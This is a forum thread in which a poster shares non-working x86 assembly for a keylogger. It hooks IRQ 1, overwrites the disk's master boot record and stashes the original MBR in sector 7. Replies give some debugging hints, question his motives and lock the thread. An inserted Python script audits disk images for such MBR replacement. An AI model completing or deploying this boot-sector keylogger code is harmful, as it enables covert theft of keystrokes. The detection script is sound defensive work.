hook irq1 installed at MBR
Posted: Wed Jan 24, 2018 7:46 am
by Apolo
I am coding a program that hooks IRQ 1 and is installed onto the MBR, and restores the original MBR that is saved at sector 7; however, the OS doesn't bootstrap. Here is my code:
org 100h
start:
MOV AX,201H
MOV BX,0E00H
MOV CX,1
MOV DX,80H
INT 13H
MOV AX,301H
MOV CX,7
INT 13H
MOV SI,int9_installer
MOV DI,0E00H
MOV CX,1FDH
REP MOVSB
ES
MOV WORD[0FFEH],0AA55h
MOV AX,301H
MOV CX,1
INT 13H
RET
int9_installer:
cli
push es
mov ax,0
mov es,ax
es
mov cx,[24h]
es
mov dx,[26h]
...
mov cx,0
mov dx,2000h
es
mov [24h],cx
es
mov [26h],dx
pop es
sti
...
mov si,3100h
mov al,10h
mov [si],al
mov al,0
mov [si+1],al
mov al,01
mov [si+2],al
mov al,0
mov [si+3],al
MOV AX,7C00H
mov [si+4],ax
mov ax,0h
mov [si+6],ax
mov ax,7
mov [si+8],ax
xor ax,ax
mov [si+0ah],ax
mov [si+0ch],ax
mov [si+0eh],ax
mov ah,42h
mov dl,80h
INT 13H
JMP 0:7C00H
Where is my code above wrong???
Re: hook irq1 installed at MBR
Posted: Wed Jan 24, 2018 10:20 am
by iansjack
You don't initialize the segment registers, you don't initialize the direction flag, and you set the origin to 100h, which is almost certainly not what you intended. I'm not going to wade through the code to find other mistakes, but those ones need to be corrected first.
Re: hook irq1 installed at MBR
Posted: Wed Jan 24, 2018 10:44 am
by AJ
Hi,
In addition to iansjack's post, we have absolutely no context for the code. You call this a "program". Does that mean that it is *not* running in a freestanding environment (which could also explain the org directive)?
We also don't have a very good idea of what you expect to see compared with what you actually do see. Can you use some other tool to verify that the sectors are on disk where you expect them to be?
Cheers,
Adam
Re: hook irq1 installed at MBR
Posted: Wed Jan 24, 2018 11:22 am
by Apolo
My code is a keylogger that hooks IRQ 1 and is installed onto the MBR, and the original MBR is written at sector 7 to be jumped to after my keylogger is installed. The org 100h directive is because it is written in fasm. How do I set the direction flag, and what value should I set the segment registers to?
Re: hook irq1 installed at MBR
Posted: Wed Jan 24, 2018 11:30 am
by iansjack
I think you need to learn a little more about how the processor works, its state after reset, and the boot sequence before attempting this sort of program. Also, I'm not convinced that you understand the ORG directive.
And, I guess, the question is what are you attempting to achieve by hooking this interrupt. It is, potentially, something that I wouldn't feel comfortable helping with.
Re: hook irq1 installed at MBR
Posted: Wed Jan 24, 2018 9:58 pm
by Brendan
Hi,
Apolo wrote:My code is a keylogger that hooks IRQ 1 and is installed onto the MBR, and the original MBR is written at sector 7 to be jumped to after my keylogger is installed. The org 100h directive is because it is written in fasm. How do I set the direction flag, and what value should I set the segment registers to?
To clear the direction flag, use the CLD instruction.
The BIOS loads the MBR at "some combination of segment:offset that adds up to 0x0007C00". If you set ORG to 0x0100 (telling the assembler to assume the "offset" for the start of your code will be 0x0100) then you'd need your segments to fulfil the equation "0x0007C00 = (segment / 16) + 0x0100". That means you'd need to set segments to 0x07D0. Note that it's much easier to set ORG to 0x00007C00 and set all segments to zero.
For the rest, for assembly language there are only 2 kinds of bugs - the comments don't describe a correct algorithm, or the instructions don't match the comments. Your code has no comments and therefore your code is 100% bugs.
Finally; don't forget that all sane operating systems dispose of the BIOS early during boot and install their own (protected mode or long mode) device drivers with their own IRQ handlers; so (assuming things like TPM and "secureboot" don't do their job) your code still can't work.
Cheers,
Brendan
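A defender-side check for the kind of boot-sector replacement this thread describes, added here as an example that is not part of the original thread: it audits a raw disk image for a modified LBA 0 and for a stashed copy of the original MBR elsewhere in the first track (the thread's "sector 7" is a 1-based INT 13h CHS sector, i.e. LBA 6). The disk image, the baseline hash and all function names are constructed for this example.

```python
import hashlib

SECTOR = 512
SIG_OFF = 0x1FE          # the boot signature occupies the last two bytes
BOOT_SIG = b"\x55\xAA"   # 0xAA55 stored little-endian

def has_boot_signature(sector: bytes) -> bool:
    """True if a 512-byte sector ends with the 0xAA55 boot signature."""
    return len(sector) == SECTOR and sector[SIG_OFF:] == BOOT_SIG

def sector_hash(sector: bytes) -> str:
    return hashlib.sha256(sector).hexdigest()

def audit_mbr(image: bytes, baseline_hash: str) -> dict:
    """Compare LBA 0 with a known-good hash and look for a relocated copy.

    Returns {'mbr_ok': bool, 'relocated_copies': [lba, ...]}; the list holds
    every sector other than LBA 0 that carries a boot signature AND hashes to
    the known-good MBR, which is what a boot-sector hook that parks the
    original MBR in a spare sector leaves behind."""
    sectors = [image[i:i + SECTOR] for i in range(0, len(image), SECTOR)]
    mbr_ok = sector_hash(sectors[0]) == baseline_hash
    copies = [lba for lba, s in enumerate(sectors)
              if lba != 0 and has_boot_signature(s)
              and sector_hash(s) == baseline_hash]
    return {"mbr_ok": mbr_ok, "relocated_copies": copies}

# Constructed sample data (not a real disk): a "known good" MBR whose code
# area is a recognisable filler pattern, terminated by the boot signature.
GOOD_MBR = b"\xEB\xFE" + b"\x90" * (SIG_OFF - 2) + BOOT_SIG
BASELINE = sector_hash(GOOD_MBR)

def build_clean_image() -> bytes:
    """Eight sectors: the good MBR followed by seven empty sectors."""
    return GOOD_MBR + b"\x00" * SECTOR * 7

def build_hooked_image() -> bytes:
    """Constructed image mimicking the thread's layout: a replacement sector
    at LBA 0 and the original MBR parked at CHS sector 7, i.e. LBA 6."""
    replacement = b"\xCC" * SIG_OFF + BOOT_SIG
    sectors = [replacement] + [b"\x00" * SECTOR] * 7
    sectors[6] = GOOD_MBR
    return b"".join(sectors)

if __name__ == "__main__":
    print(audit_mbr(build_clean_image(), BASELINE))
    print(audit_mbr(build_hooked_image(), BASELINE))
```

On a real system the baseline hash would be recorded from a trusted MBR image, and the first track (LBA 0 up to the first partition) read with a raw block device tool before calling audit_mbr.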
Re: hook irq1 installed at MBR
Posted: Thu Jan 25, 2018 5:19 am
by AJ
That last point is the most important for a keylogger. Any OS worth its salt will end up reinstalling an IDT, and chances are your code will end up in an unmapped memory page anyway.
You'd generally be better off with a hardware key logger, but what you are doing may be at best immoral and at worst illegal.
Before we go further, could you clarify the intention of what you are doing. If you're just playing with boot code on your own machine then fine.
Cheers,
Adam
Re: hook irq1 installed at MBR
Posted: Fri Jan 26, 2018 4:26 am
by Apolo
I think the BIOS of my PCs is all infected, because I tried this most simple code but the PCs still don't bootstrap. See my most simple code:
start:
MOV AX,201H
MOV BX,0E00H
MOV CX,1
MOV DX,80H
INT 13H
MOV CX,7
MOV AX,301H
INT 13H
MOV CX,1BDH
MOV SI,example
MOV DI,0E00H
REP MOVSB
MOV AX,301H
MOV BX,0E00H
MOV AX,301H
MOV CX,1
INT 13H
RET
example:
MOV AX,201H
PUSH ES
MOV BX,0
MOV ES,BX
MOV BX,7C00H
MOV CX,7
INT 13H
POP ES
cs
jmp bx
codesize:
Aaaaaaaaa! What is the problem with my code?
Re: hook irq1 installed at MBR
Posted: Fri Jan 26, 2018 5:15 am
by iansjack
The main problem is that you haven't told us what you are trying to do and why. Until we know that it is unlikely that you will get any further help on this forum. It's devoted to OS development, not hacking.
Re: hook irq1 installed at MBR
Posted: Fri Jan 26, 2018 5:24 am
by AJ
You have one more attempt at explaining why you are doing this before the thread gets locked. If you are doing this for legit reasons, it sounds like an interesting problem to tackle, but we will also need more of a technical explanation. A bug in your code or methodology is much more likely than your BIOS being infected.
Cheers,
Adam
Re: hook irq1 installed at MBR
Posted: Fri Jan 26, 2018 5:31 am
by Apolo
Summary:
I am trying to bootstrap from sector 7, which is where the original MBR is written. Can someone help me?? I am desperate!
Re: hook irq1 installed at MBR
Posted: Fri Jan 26, 2018 6:02 am
by AJ
Unfortunately locked as promised. I can only assume that this is being done for nefarious purposes...